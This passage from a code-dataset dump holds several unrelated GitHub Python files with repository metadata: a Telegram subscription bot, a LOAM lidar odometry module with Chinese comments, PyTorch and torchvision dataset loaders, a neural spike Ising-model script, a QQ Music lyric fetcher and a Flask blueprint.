списком\n","repo_name":"G000D1ESS/todo-lists-django","sub_path":"functional_tests/test_simple_list_creation.py","file_name":"test_simple_list_creation.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"17142531341","text":"#!/usr/bin/env python3\n\nimport argparse\nimport pickle\n\nimport torch\n\nfrom torch_model import SentenceEncoder\nfrom WordVector import WordVector\n\nfrom torch_model import evaluate, make_data_loader, create_encoder\n\n\ndef parse_cmdline():\n p = argparse.ArgumentParser()\n p.add_argument('--w2v', required=True)\n p.add_argument('--dataset', required=True)\n p.add_argument('--model', required=True)\n return p.parse_args()\n\n\ndef main():\n cmdline = parse_cmdline()\n\n with open(cmdline.dataset, 'rb') as f:\n dataset = pickle.load(f)\n\n loader = make_data_loader(dataset['test'], False)\n\n word2vec = WordVector()\n word2vec.load_bin(cmdline.w2v)\n encoder = create_encoder(word2vec)\n encoder.load_state_dict(torch.load(cmdline.model))\n\n r = evaluate(loader, encoder, None)\n print(r)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"torshie/learn-tensorflow","sub_path":"qqp/eval_torch_model.py","file_name":"eval_torch_model.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33657345275","text":"import json\nimport telebot\nimport os\nfrom config import user_message_chain, admin_message_chain, message_to_send_template, subscribe_user_message_chain\nfrom db import collection\n\nbot = telebot.TeleBot(os.getenv('TG_BOT_TOKEN'), parse_mode=None, threaded=False)\n\ndestination_group_id = int(os.getenv('DESTINATION_GROUP_ID'))\nadmin_id = int(os.getenv('ADMIN_ID'))\n\n\n@bot.message_handler(commands=['subscribe'])\ndef subscribe(message):\n add_subscriber(message.chat.id)\n bot.send_message(message.chat.id, text=subscribe_user_message_chain[0])\n\n\n@bot.message_handler(commands=['unsubscribe'])\ndef unsubscribe(message):\n remove_subscriber(message.chat.id)\n bot.send_message(message.chat.id, text=subscribe_user_message_chain[1])\n\n\n@bot.message_handler(commands=['unsubscribe'])\ndef start(message):\n photo = open('0.jpg', 'rb')\n bot.send_photo(message.chat.id, photo)\n\n bot.send_message(message.chat.id, text=user_message_chain[0])\n bot.send_message(message.chat.id, text=user_message_chain[1])\n bot.register_next_step_handler(message, get_name)\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n photo = open('0.jpg', 'rb')\n bot.send_photo(message.chat.id, photo)\n\n bot.send_message(message.chat.id, text=user_message_chain[0])\n bot.send_message(message.chat.id, text=user_message_chain[1])\n bot.register_next_step_handler(message, get_name)\n\n\ndef get_name(message):\n name = message.text.strip()\n photo = open('1.jpg', 'rb')\n bot.send_photo(message.from_user.id, photo)\n bot.send_message(message.from_user.id, text=user_message_chain[2].format(name=name))\n bot.register_next_step_handler(message, get_description, name.capitalize())\n\n\ndef get_description(message, name):\n description = message.text.lower().strip()\n bot.send_message(message.from_user.id, text=user_message_chain[3])\n bot.register_next_step_handler(message, get_contact, name, description)\n\n\ndef get_contact(message, name, description):\n contact = message.text.lower().strip()\n send_data(name, description, contact)\n bot.send_message(message.from_user.id, text=user_message_chain[4].format(name=name))\n\n\ndef send_data(name, description, contact):\n bot.send_message(destination_group_id,\n text=user_message_chain[5].format(name=name, description=description, contact=contact))\n\n\n@bot.message_handler(func=lambda message: message.from_user.id == admin_id and\n (message.text.strip().startswith('https://www.youtube')\n or message.text.strip().startswith('https://youtube')\n or message.text.strip().startswith('https://youtu.be')))\ndef send_stream_notification(message):\n link = message.text.lower().strip()\n\n bot.send_message(message.chat.id, text=admin_message_chain[0])\n bot.register_next_step_handler(message, get_stream_name, link)\n\n\ndef get_stream_name(message, link):\n stream_name = message.text.strip()\n result_message_to_send = message_to_send_template.format(name_stream=stream_name, link=link)\n\n bot.send_message(message.chat.id, text=admin_message_chain[1].format(user_count=get_subscribers_count()))\n subscribers = get_subscribers()\n\n for subscriber in subscribers:\n bot.send_message(subscriber['tg_id'], result_message_to_send)\n\n bot.send_message(message.chat.id, text=admin_message_chain[2])\n\n\ndef process_event(event):\n request_body_dict = json.loads(event['body'])\n update = telebot.types.Update.de_json(request_body_dict)\n bot.process_new_updates([update])\n\n\ndef get_subscribers_count():\n return collection.count_documents({})\n\n\ndef get_subscribers():\n return collection.find({})\n\n\ndef add_subscriber(user_id):\n collection.update_one({'tg_id': user_id}, {'$set': {'tg_id': user_id}}, upsert=True)\n\n\ndef remove_subscriber(user_id):\n collection.delete_one({'tg_id': user_id})\n\n\ndef main(event=None, context=None):\n process_event(event)\n return {\n 'statusCode': 200\n }\n","repo_name":"Tsarikovich/yanajoj_bot","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39815467946","text":"import mrob\nimport numpy as np\nimport open3d as o3d\n\nfrom feature_extractor import FeatureExtractor\nfrom optimizer import LOAMOptimizer\nfrom utils import get_pcd_from_numpy, matrix_dot_product\nimport utils\n'''\n整个代码特征命名方式过于混乱,sharp/edge planer/flat一直在交替使用\n实际上是等价的,需要进行统一\n'''\nclass OdometryEstimator:\n '''\n 可能:DISTANCE_SQ_THRESHOLD的设置对heading 旋转速度较大的情况十分敏感,也就是当绕z轴旋转速度较快时,该阈值可能造成丢失大量\n 可以考虑利用z轴角速度积分来限定距离阈值或其它策略\n '''\n DISTANCE_SQ_THRESHOLD = 1 # kitti_vlp64的0.1fps,1m约束近似10m/s=36km/h(数据采集车速基本<40km/h), 为低速状态下的估计;自适应速度可由acc积分估算替换\n SCAN_VICINITY = 2.5 # VFOV=26.9 可认为是为了适配多线束、垂直分辨率小抖动匹配的; vlp16在适配时,垂直分辨率大不知道是否需要调小\n\n def __init__(self):\n self.extractor = FeatureExtractor() # 特征提取器\n\n self.inited = False\n self.last_less_sharp_points = None # 上一帧边特征\n self.last_less_flat_points = None # 上一帧面特征\n self.last_position = np.eye(4) # 位姿矩阵 用于每次初始化配准\n\n def append_pcd(self, pcd):\n # input: 点序列 起点索引 终点索引\n # output: 强边、边、强面、面\n sharp_points, less_sharp_points, flat_points, less_flat_points = self.extractor.extract_features(pcd[0], pcd[1],\n pcd[2])\n T = None\n if not self.inited:\n self.inited = True\n T = np.zeros(6) # 全局初始\n else:\n edge_corresp = self.find_edge_correspondences(sharp_points) # 基于当前帧t中的sharp,在上一帧t-1寻找满足条件的sharp_less\n surface_corresp = self.find_surface_correspondences(flat_points, pcd) # 基于当前帧t中的flap,在上一帧t-1寻找满足条件的flap_less\n optimizer = LOAMOptimizer(edge_corresp, surface_corresp) # 最小二乘 求相邻帧优化信息\n T = optimizer.optimize()\n\n ''' 又对surface进行了一次可视化,这里需要注意的是作者直接在未使用T进行处理的情况下,将 PCD[t], orig[t] 和 keypoints[t-1]\n surf = np.vstack((surface_corresp[1], surface_corresp[2], surface_corresp[3])) # j l m 0=pcd[feature point]\n keypoints = utils.get_pcd_from_numpy(surf)\n keypoints.paint_uniform_color([0, 1, 0])\n pcd = utils.get_pcd_from_numpy(mrob.geometry.SE3(T).transform_array(pcd[0]))\n pcd.paint_uniform_color([0, 0, 1])\n orig = utils.get_pcd_from_numpy(surface_corresp[0]) # t时刻特征,面特征(存在对应参考点)\n orig.paint_uniform_color([1, 0, 0])\n o3d.visualization.draw_geometries([pcd, keypoints, orig])\n '''\n #'''\n # 更新last less edge 和 less planer 特征\n #import time\n #b1=time.time()\n self.last_less_sharp_points = np.vstack(less_sharp_points) # list2array, 直接无排序\n '''\n 由于平面点太多,之前估计单帧都在8w+, 利用open3d进行 体素化降采样,并且通过color保留ring number值\n 需要将[xyz scan_id]拆分--降采样--合并\n '''\n x = get_pcd_from_numpy(np.vstack(less_flat_points)) # 平面点?\n y = np.vstack(less_flat_points)[:, 3].reshape((-1, 1)) # / 64 # 归一化做颜色\n x.colors = o3d.utility.Vector3dVector(np.hstack((y, y, y)))\n x = x.voxel_down_sample(0.1) # 降采样 voxelsize=0.1^3\n scan_ids = np.asarray(x.colors)[:, 0].reshape(-1, 1).astype(np.int16) # (64 * np.asarray(x.colors)[:, 0].reshape(-1, 1)).astype(np.int16)\n self.last_less_flat_points = np.hstack((np.asarray(x.points), scan_ids)) #scan_ids))\n scan_ids = self.last_less_flat_points[:, 3]\n sorted_ind = np.argsort(scan_ids, kind='stable')\n self.last_less_flat_points = self.last_less_flat_points[sorted_ind] # 基于ring number 排序\n # 更新 最后的 T 到 self.last_position\n self.last_position = mrob.geometry.SE3(T).T() @ self.last_position # 更新最后的T\n\n #b2 = time.time()\n '''\n self.last_less_sharp_points = np.vstack(less_sharp_points)\n x = get_pcd_from_numpy(np.vstack(less_flat_points))\n y = np.vstack(less_flat_points)[:, 3].reshape((-1, 1)) / 64\n x.colors = o3d.utility.Vector3dVector(np.hstack((y, y, y)))\n x = x.voxel_down_sample(0.1)\n self.last_less_flat_points = np.hstack((np.asarray(x.points), 64 * np.asarray(x.colors)[:, 0].reshape((-1, 1))))\n scan_ids = self.last_less_flat_points[:, 3]\n sorted_ind = np.argsort(scan_ids, kind='stable')\n self.last_less_flat_points = self.last_less_flat_points[sorted_ind]\n self.last_position = mrob.geometry.SE3(T).T() @ self.last_position\n print(time.time()-b2,b2-b1)\n '''\n return mrob.geometry.SE3(T).T(), self.last_less_flat_points, self.last_less_flat_points\n '''\n 当前帧的 edge特征i 在上一帧的 less_edge找到相关的参考点集\n 基于‘点线距离’求解准备,针对t时刻的特征,需要找到t-1时刻的两个相邻特征\n 先找到距离i最近的一个特征点j,\n 然后找到与j不在同一扫描线上的l,l到i最近,且在j的前后2根扫描线上。\n 共同构成(j,l)\n '''\n def find_edge_correspondences(self, sharp_points):\n\n corners_cnt = len(sharp_points)\n\n edge_points = []\n edge_1 = []\n edge_2 = []\n # 基于上一帧点云less_edge特征构建KDtree\n less_sharp_points_tree = o3d.geometry.KDTreeFlann(get_pcd_from_numpy(self.last_less_sharp_points))\n # 遍历当前强边特征(edge[t])\n for i in range(corners_cnt):\n point_sel = sharp_points[i] # 当前点(xyzr)\n _, idx, dist = less_sharp_points_tree.search_knn_vector_3d(point_sel[:3], 1) # 数量默认1,不进行获取,返回kd-tree中最近的knn=1个邻居点\n min_point_ind_2 = -1\n if dist[0] < self.DISTANCE_SQ_THRESHOLD: # 在距离1m范围内\n closest_point_ind = idx[0] # j点\n min_point_sq_dist_2 = self.DISTANCE_SQ_THRESHOLD\n closest_point_scan_id = self.last_less_sharp_points[closest_point_ind][3] # j点的ring number\n # 当前点到所有 边特征的“距离”\n dist_to_sel_point = matrix_dot_product((self.last_less_sharp_points[:, :3] - point_sel[:3]),\n (self.last_less_sharp_points[:, :3] - point_sel[:3]))\n # 从排除j之后,开始遍历上一帧点云 less sharp特征的剩余点寻找l\n # 上扫描线遍历[r + 1, r + 2]\n for j in range(closest_point_ind + 1, len(self.last_less_sharp_points)):\n # 只有扫描线不超过 对应点scan number的情况下进行,需要排除当前扫描线上的点\n if self.last_less_sharp_points[j][3] <= closest_point_scan_id:\n continue\n if self.last_less_sharp_points[j][3] > closest_point_scan_id + self.SCAN_VICINITY: #\n break\n # 满足扫描线约束的点距离\n point_sq_dist = dist_to_sel_point[j]\n if point_sq_dist < min_point_sq_dist_2: # 到他距离小于1的邻居点\n min_point_sq_dist_2 = point_sq_dist\n min_point_ind_2 = j\n # 下扫描线遍历 [r - 1, r - 2]\n for j in range(closest_point_ind - 1, -1, -1):\n if self.last_less_sharp_points[j][3] >= closest_point_scan_id: # >=ring\n continue\n if self.last_less_sharp_points[j][3] < closest_point_scan_id - self.SCAN_VICINITY: # = 0:\n edge_points.append(point_sel) # E(t)特征点\n edge_1.append(self.last_less_sharp_points[closest_point_ind]) # 对应j\n edge_2.append(self.last_less_sharp_points[min_point_ind_2]) # 对应l\n # 入队\n edge_points = np.vstack(edge_points)[:, :3]\n edge_1 = np.vstack(edge_1)[:, :3]\n edge_2 = np.vstack(edge_2)[:, :3]\n\n return edge_points, edge_1, edge_2\n '''\n 基于当前点F(t)中的i, ���到F(t-1)中的 不共线的三点j l m\n 基于 点到平面距离,构建correspondence\n 先找到距离i最近的一点j\n 然后找另外两个到i最近的点l,m\n 其中,l与j共扫描线,但l!=j\n 其中,m在j的上下扫描线上/scan+-2, zhangji17仅考虑上下1根相邻扫描线\n '''\n def find_surface_correspondences(self, flat_points, pcd): # pcd for visualization only\n surface_cnt = len(flat_points)\n print('Surface count: ', surface_cnt)\n\n surface_points = [] # i \\in flap[t]\n surface_1 = [] # j \\in less_flap[t-1]\n surface_2 = [] # m \\in less_flap[t-1]\n surface_3 = [] # l \\in less_flap[t-1]\n\n less_flat_points_tree = o3d.geometry.KDTreeFlann(get_pcd_from_numpy(self.last_less_flat_points)) # F(t-1)的KD-tree\n for i in range(surface_cnt):\n point_sel = flat_points[i] # 点I\n _, idx, dist = less_flat_points_tree.search_knn_vector_3d(point_sel[:3], 1) # 搜索到I最近的点\n min_point_ind_2 = -1\n min_point_ind_3 = -1\n # less_flat[t-1]中所有点到i的距离\n dist_to_sel_point = matrix_dot_product((self.last_less_flat_points[:, :3] - point_sel[:3]),\n (self.last_less_flat_points[:, :3] - point_sel[:3]))\n\n closest_point_ind = idx[0] # 点J\n v = self.last_less_flat_points[closest_point_ind][:3] - point_sel[:3]\n dist = np.dot(v, v) # J到I的‘距离’, 满足1m内约束条件\n if dist < self.DISTANCE_SQ_THRESHOLD:\n closest_point_scan_id = self.last_less_flat_points[closest_point_ind][3] # J的scan id\n min_point_sq_dist_2 = self.DISTANCE_SQ_THRESHOLD # 1m\n min_point_sq_dist_3 = self.DISTANCE_SQ_THRESHOLD # 1m\n\n for j in range(closest_point_ind + 1, len(self.last_less_flat_points)):\n if self.last_less_flat_points[j][3] > closest_point_scan_id + self.SCAN_VICINITY: # [scan_j+3,63]\n break\n\n point_sq_dist = dist_to_sel_point[j]\n # [0, scan_j]\n if self.last_less_flat_points[j][3] <= closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_2: # l与j共扫描线, 其余靠距离阈值过滤\n min_point_sq_dist_2 = point_sq_dist\n min_point_ind_2 = j\n # [scan_j+1, scan_j+2]\n elif self.last_less_flat_points[j][3] > closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_3: # m与j不共扫描线\n min_point_sq_dist_3 = point_sq_dist\n min_point_ind_3 = j\n\n for j in range(closest_point_ind - 1, -1, -1):\n if self.last_less_flat_points[j][3] < closest_point_scan_id - self.SCAN_VICINITY: # [0,scan_j-3]\n break\n\n point_sq_dist = dist_to_sel_point[j]\n # [scan_j,63]\n if self.last_less_flat_points[j][3] >= closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_2:\n min_point_sq_dist_2 = point_sq_dist\n min_point_ind_2 = j\n # [scan_j-2,scan_j-1]\n elif self.last_less_flat_points[j][3] < closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_3:\n min_point_sq_dist_3 = point_sq_dist\n min_point_ind_3 = j\n\n if min_point_ind_2 >= 0 and min_point_ind_3 >= 0:\n surface_points.append(point_sel) # from current pcd[t]\n # from last frames\n surface_1.append(self.last_less_flat_points[closest_point_ind]) # 点J\n surface_2.append(self.last_less_flat_points[min_point_ind_2]) # 点L\n surface_3.append(self.last_less_flat_points[min_point_ind_3]) # 点 M\n\n surface_points = np.vstack(surface_points) # i\n surface_1 = np.vstack(surface_1) # j\n surface_2 = np.vstack(surface_2) # l\n surface_3 = np.vstack(surface_3) # m\n ind = surface_1[:, 3] > 0 # 逻辑上应该所有 scan id都大于0, 排除最近一圈在车上的?\n\n ''' i的对应特征点jlm,应该越多越好,而且应该是满足距离阈值(1m)越小越好\n # 可视化将前后两帧的特征点投影在同一坐标系下,满足相对T计算前提\n print('output: ', surface_points.shape[0])\n surf = np.vstack((surface_1[ind], surface_2[ind], surface_3[ind])) # t-1 中的参考点 j+l+m\n keypoints = utils.get_pcd_from_numpy(surf)\n keypoints.paint_uniform_color([0, 1, 0]) # green\n pcd = utils.get_pcd_from_numpy(pcd[0]) # t时刻面特征(存在对应参考点的)\n pcd.paint_uniform_color([0, 0, 1]) # blue\n orig = utils.get_pcd_from_numpy(surface_points[ind]) # 使用t-1的索引调t时刻pcd中的点\n orig.paint_uniform_color([1, 0, 0]) # red\n # o3d.visualization.draw_geometries([pcd, keypoints, orig]) # t, t-1, t| _:3:1\n o3d.visualization.draw_geometries([keypoints, orig])\n '''\n return surface_points[ind][:, :3], surface_1[ind][:, :3], surface_2[ind][:, :3], surface_3[ind][:, :3]\n","repo_name":"hahakid/Chinese-Note-for-Py-LOAM","sub_path":"LOAM/odometry_estimator.py","file_name":"odometry_estimator.py","file_ext":"py","file_size_in_byte":14524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33427347482","text":"import pandas as pd\nimport numpy as np\nfrom PIL import Image\nimport io\nimport math\nfrom sklearn.datasets import load_iris, load_wine, load_diabetes, load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nimport sklearn.utils\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision\nfrom torchvision import transforms\nfrom typing import cast, Any, Dict, List, Tuple, Optional, Union\n\nfrom .constants import logger\nfrom .transforms import *\n\nTS_DATASETS = ['iris', 'wine', 'diabetes', 'breast_cancer']\nCV_DATASETS = ['mnist', 'fashion_mnist', 'cifar', 'celeba']\n\n\ndef load_dataset(name: str, shuffle: bool=False, transform: Any=None, transform_params: Dict=None, ):\n if name in TS_DATASETS:\n return _load_ts_dataset(name, shuffle=shuffle, transform=transform)\n elif name in CV_DATASETS: \n return _load_cv_dataset(name, shuffle=shuffle, transform=transform, \n transform_params=transform_params)\n else:\n raise ValueError(f'Unknown dataset: {name}')\n\ndef _load_ts_dataset(name: str, shuffle: bool=False, split: bool=False, transform: Dict=None):\n if name == 'iris':\n dataset = load_iris()\n elif name == 'wine':\n dataset = load_wine()\n elif name == 'diabetes':\n dataset = load_diabetes()\n elif name == 'breast_cancer':\n dataset = load_breast_cancer()\n else:\n raise ValueError(f'Unknown dataset: {name}')\n \n df = pd.DataFrame(dataset.data, columns=dataset.feature_names)\n df['target'] = pd.Series(dataset.target)\n \n if transform:\n df = apply_transforms(df, transform)\n \n if shuffle:\n df = sklearn.utils.shuffle(df)\n \n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n return X, y\n\ndef _load_cv_dataset(name: str, shuffle: bool=False, transform: List=None, transform_params: Dict=None):\n if name == 'mnist':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.1307,), (0.3081,))])\n dataset_train = torchvision.datasets.MNIST('../../data', train=True, transform=transform, download=True)\n dataset_test = torchvision.datasets.MNIST('../../data', train=False, transform=transform, download=True) \n elif name == 'fashion_mnist':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform=transforms.Compose([transforms.ToTensor()])\n dataset_train = torchvision.datasets.FashionMNIST('../../data', train=True, transform=transform, download=True)\n dataset_test = torchvision.datasets.FashionMNIST('../../data', train=False, transform=transform, download=True) \n elif name == 'cifar':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset_train = torchvision.datasets.CIFAR10('../../data', train=True, transform=transform, download=True)\n dataset_test = torchvision.datasets.CIFAR10('../../data', train=False, transform=transform, download=True) \n elif name == 'celeba':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.CelebA('../../data', split='all', transform=transform, download=False)\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])\n else:\n raise ValueError(f'Unknown dataset: {name}')\n \n dataset = torch.utils.data.ConcatDataset([dataset_train, dataset_test])\n return dataset\n\ndef convert_dataset_to_numpy(dataset, shuffle=False):\n try:\n dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=shuffle)\n X, y = next(iter(dataloader))\n except RuntimeError as err:\n if str(err).startswith('stack expects each tensor to be equal size'):\n inp = input('Not all images have equal size. Choose size : ')\n size = tuple(map(int, inp.split('x')))\n new_transforms = [transforms.Resize(size)]\n update_transforms(dataset, new_transforms)\n dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=shuffle)\n X, y = next(iter(dataloader))\n else:\n raise RuntimeError(str(err))\n \n X = X.numpy() \n y = y.numpy()\n return X, y \n \n################## Util datasets ############################ \n \nclass NumpyDataset(Dataset):\n \n def __init__(self, data, targets, transform=None):\n self.data = data\n self.targets = torch.LongTensor(targets)\n self.transform = transform\n \n def __getitem__(self, idx):\n X = self.data[idx]\n y = self.targets[idx]\n \n if self.transform:\n X = Image.fromarray(self.data[idx].astype(np.uint8).transpose(1,2,0))\n X = self.transform(X)\n \n return X, y\n \n def __len__(self):\n return len(self.data)\n \nclass CSVFolderDataset(Dataset):\n \n def __init__(self, csv_file, root_dir, transform=None):\n \"\"\"\n Keyword arguments:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied on a sample.\n \"\"\"\n self.df = pd.read_csv(csv_file)\n self.root_dir = root_dir\n self.transform = transform\n \n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = os.path.join(self.root_dir, self.df.loc[idx, 'name'])\n X = io.imread(img_name)\n y = self.df.loc[idx, 'target']\n\n if self.transform:\n X = self.transform(X)\n\n return X, y\n \nclass CSVDataset(Dataset):\n \n # TODO Mode necessary?\n def __init__(self, csv_file, transform=None, mode='gray'):\n \"\"\"\n Keyword arguments:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied on a sample.\n \"\"\"\n self.df = pd.read_csv(csv_file)\n self.transform = transform\n \n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n # TODO add standard implementation for csv (rgb and gray)\n if 'width' in self.df and 'heigth' in self.df:\n width = self.df.loc[idx, 'width']\n heigth = self.df.loc[idx, 'heigth']\n elif 'size' in self.df:\n width = self.df.loc[idx, 'size']\n heigth = self.df.loc[idx, 'size']\n elif 'width' in self.df: \n width = self.df.loc[idx, 'width']\n heigth = (self.df.shape[1] - 1) // width\n elif 'heigth' in self.df:\n heigth = self.df.loc[idx, 'heigth']\n width = (self.df.shape[1] - 1) // heigth\n else:\n width = int(math.sqrt(self.df.shape[1] - 1))\n heigth = width\n \n array = np.zeros((width, heigth))\n for y in range(1, heigth):\n for x in range(1, width):\n array[x, y] = self.df.loc[idx, str(x) + 'x' + str(y)] \n X = Image.fromarray(array) \n if self.transform:\n X = self.transform(X)\n \n if 'target' in self.df:\n y = self.df.loc[idx, 'target']\n elif 'label' in self.df:\n y = self.df.loc[idx, 'label']\n elif 'class' in self.df:\n y = self.df.loc[idx, 'class']\n else:\n raise ValueError(f'Target column not found')\n return X, y \n\nclass Data_rb_cla(Dataset):\n \n def __init__(self, Xs, ys):\n # input is type of pandas\n self.Xs = torch.from_numpy(Xs.to_numpy()).float()\n self.ys = torch.from_numpy(ys.to_numpy()).long()\n\n def __len__(self):\n return len(self.Xs)\n\n def __getitem__(self, idx):\n return self.Xs[idx], self.ys[idx]\n\n\nclass Data_rb_reg(Dataset):\n \n def __init__(self, Xs, ys):\n # input is type of pandas\n self.Xs = torch.from_numpy(Xs.to_numpy()).float()\n self.ys = torch.from_numpy(ys.to_numpy()).float()\n\n def __len__(self):\n return len(self.Xs)\n\n def __getitem__(self, idx):\n return self.Xs[idx], self.ys[idx]\n \nclass MLP(torch.nn.Module):\n \n def __init__(self, input_size=6, hidden_size=32, output_size=1):\n super(MLP, self).__init__()\n self.layers = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n )\n self.ln = nn.Linear(hidden_size, output_size)\n\n def forward(self, inp):\n '''\n inp shape of torch tensor\n '''\n out = self.ln(self.layers(inp))\n return out","repo_name":"sdsc-bw/DataFactory","sub_path":"datafactory/util/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"11345441371","text":"import numpy as np\r\nfrom Functions_Ising_model import *\r\n\r\nN = 100\r\nbinsize = 0.02\r\nrng = np.random.default_rng(N)\r\n\r\nwith open(\"Data/Rat 3D Tracking & E-Phys KISN 2020 Dataset/concatenated_spike_times_26471_bank0_495neurons_6sessions.npz\", \"rb\") as file: \r\n data = np.load(file, allow_pickle=True)\r\n spike_times, interval = data[\"spike_times\"], data[\"interval\"]\r\n\r\nsubpop = rng.choice(len(spike_times), N, replace=False)\r\nsamples_data = time_binning(spike_times[subpop], interval, binsize)\r\n\r\nh, J = pseudolikelihood_sklearn(samples_data)\r\n\r\nnr_samples = samples_data.shape[0]\r\nsamples_pair = Metropolis_samples(nr_samples, h, J, 0.5, rng)\r\n\r\ncorrs3_data = corrs3(samples_data)\r\ncorrs3_pair = corrs3(samples_pair)\r\n\r\nfilename = f\"corrs3_{N}neurons.npz\" \r\ninfo = f\"Third-order correlations from a random subpopulation of {N} neurons (from Neuropixel data) \\\r\n and equally many samples from the pairwise model inferred with pseudolikelihood. \\\r\n Pseudolikelihood was used to approximate the parameters. Seed = {N}, binsize = {binsize}.\" \r\nnp.savez(filename, info=info, corrs3_data=corrs3_data, corrs3_pair=corrs3_pair, allow_pickle=True)\r\n","repo_name":"MarvelousTurtle/Master_thesis","sub_path":"Code/IDUN_corrs3.py","file_name":"IDUN_corrs3.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12420811996","text":"import base64\nimport time\nfrom typing import Optional\nfrom urllib.parse import quote_plus\n\nimport requests\n\nfrom music_service.base import BaseProvider\n\n\nclass QQMusicApi(BaseProvider):\n provider_name = 'qq'\n\n def fetch_lyric(self, name: str, artist: str = '', album: str = '', song_id: int = 0) -> Optional[str]:\n result = self.api_search_song(name, artist, album)\n item_list = result.get('data', {}).get('song', {}).get('itemlist', None)\n if not item_list:\n return None\n mid = item_list[0].get('mid', None)\n if not mid:\n return None\n lyric_result = self.api_lyric(mid)\n lyric = lyric_result.get('lyric', None)\n if not lyric:\n return None\n return base64.b64decode(lyric).decode('utf-8')\n\n def fetch_cover(self, name: str, artist: str = '', album: str = '', song_id: int = 0) -> Optional[str]:\n result = self.api_search_song(name, artist, album)\n item_list = result.get('data', {}).get('album', {}).get('itemlist', None)\n if not item_list:\n return None\n return item_list[0].get('pic', None)\n\n def api_search_song(self, name: str, artist: str = '', album: str = ''):\n key = quote_plus(f'{name} {artist}'.strip())\n url = 'https://c.y.qq.com/splcloud/fcgi-bin/smartbox_new.fcg?format=json' \\\n '&inCharset=utf-8&outCharset=utf-8&key=' + key\n return requests.get(url, headers={'Referer': 'https://c.y.qq.com/'}).json()\n\n def api_lyric(self, mid: str):\n current_millis = int((time.time()) * 1000)\n data = {\n 'pcachetime': str(current_millis),\n 'songmid': mid,\n 'g_tk': '5381',\n 'loginUin': '0',\n 'hostUin': '0',\n 'format': 'json',\n 'inCharset': 'utf8',\n 'outCharset': 'utf8',\n 'notice': '0',\n 'platform': 'yqq',\n 'needNewCode': '0',\n }\n\n url = 'https://c.y.qq.com/lyric/fcgi-bin/fcg_query_lyric_new.fcg'\n headers = {\n 'Referer': 'https://c.y.qq.com/'\n }\n return requests.post(url, data=data, headers=headers).json()\n","repo_name":"emacs-eaf/eaf-music-player","sub_path":"music_service/qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"27"} +{"seq_id":"6184455876","text":"import urllib\n\n\ndef get_movie_url(movie_name):#根据电影名称,生成搜索结果的URL\n host_url = 'http://s.dydytt.net/plus/search.php?kwtype=0&keyword='\n movie_sign = urllib.parse.quote(movie_name.encode('GBK'))\n search_url = host_url + movie_sign\n return search_url\n\nmovieName=\"Toy Story (1995)\"\nurl=get_movie_url(movieName)\nprint(url)","repo_name":"jianjunyue/deepplus","sub_path":"Word2Vec/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27613020090","text":"from flask import render_template,request,Blueprint\nfrom AMS.models import workorderPost\nfrom flask_login import current_user,login_required\ncore = Blueprint('core',__name__)\n\n@core.route('/')\ndef index():\n '''\n This is the home page view. Notice how it uses pagination to show a limited\n number of posts by limiting its query size and then calling paginate.\n '''\n workorder_posts = []\n if current_user.is_authenticated :\n page = request.args.get('page', 1, type=int)\n page = request.args.get('page', 1, type=int)\n workorder_posts = workorderPost.query.filter_by(author=current_user).order_by(workorderPost.date.desc()).paginate(page=page, per_page=5)\n\n\n return render_template('index.html',workorder_posts=workorder_posts)\n\n@core.route('/info')\ndef info():\n '''\n Example view of any other \"core\" page. Such as a info page, about page,\n contact page. Any page that doesn't really sync with one of the models.\n '''\n return 